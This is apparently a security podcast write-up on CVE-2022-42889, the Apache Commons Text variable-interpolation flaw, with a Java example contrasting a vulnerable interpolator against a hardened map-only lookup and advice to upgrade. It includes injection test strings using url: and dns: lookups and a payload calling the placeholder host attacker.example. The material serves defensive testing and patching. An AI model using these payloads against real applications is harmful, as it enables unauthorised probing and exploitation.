[Apache Commons Text] Insecure Variable Interpolation in StringLookup

web
We discussed this vulnerability during Episode 159 on 17 October 2022

Just another thing to be testing for: it was found that the Apache Commons Text library (versions 1.5 through 1.9, CVE-2022-42889) will do variable interpolation when a StringSubstitutor built with the default interpolator lookup processes a string. It supports several prefixes, such as url to fetch data from a remote URL, dns to resolve a hostname, and script to evaluate code through a JSR-223 (javax.script) scripting engine such as Nashorn. This is just a reported issue in the core library; actual vulnerable instances will vary depending on how the lookup is reached, so exploitability depends on an application passing attacker-controlled text into the substitutor. It would make sense to start tossing something like ${url:UTF-8:https://example.com} into your testing though (the url lookup takes a charset name before the URL) just to see whether your URL gets pinged; ${dns:address:example.com} is a useful DNS-only canary where outbound HTTP is blocked.
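To make the sink concrete, here is an added example (not code from the episode or from the Commons Text project) showing the pattern that is vulnerable on 1.5 through 1.9 next to a hardened variant that only resolves keys from an explicit map. The class name, method names, the "name" key and the attacker.example callback host are assumptions made up for the illustration.

```java
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class LookupDemo {

    // Vulnerable on commons-text 1.5 through 1.9: createInterpolator() wires in
    // the full default lookup set, so url:, dns: and script: prefixes inside
    // untrusted text are dispatched to network and scripting-engine lookups.
    static String renderUnsafe(String template) {
        return StringSubstitutor.createInterpolator().replace(template);
    }

    // Hardened: a plain map lookup has no prefix dispatch at all, so
    // "url:UTF-8:https://..." is just an unknown key and is left untouched.
    static String renderSafe(String template, Map<String, String> values) {
        StringLookup mapOnly = StringLookupFactory.INSTANCE.mapStringLookup(values);
        return new StringSubstitutor(mapOnly).replace(template);
    }

    public static void main(String[] args) {
        // Constructed attacker-controlled input, e.g. a form field that an
        // application later feeds into a substitutor. The host is a placeholder.
        String payload = "Hello ${url:UTF-8:https://attacker.example/ping}";

        // renderUnsafe(payload) would issue an outbound HTTP GET to
        // attacker.example on an unpatched build, which is the "ping" the
        // episode suggests testing for; it is deliberately not called here.

        Map<String, String> values = Map.of("name", "world");
        System.out.println(renderSafe("Hello ${name}", values));
        // Hello world
        System.out.println(renderSafe(payload, values));
        // Hello ${url:UTF-8:https://attacker.example/ping}  (nothing fetched)
    }
}
```

If you cannot drop the interpolator entirely, Commons Text 1.10.0 removes the dns, url and script lookups from the default set (they can be re-enabled only through the org.apache.commons.text.lookup.StringLookupFactory.defaultStringLookups system property), so upgrading is the fix when the prefixes are needed for trusted templates but must never see user input.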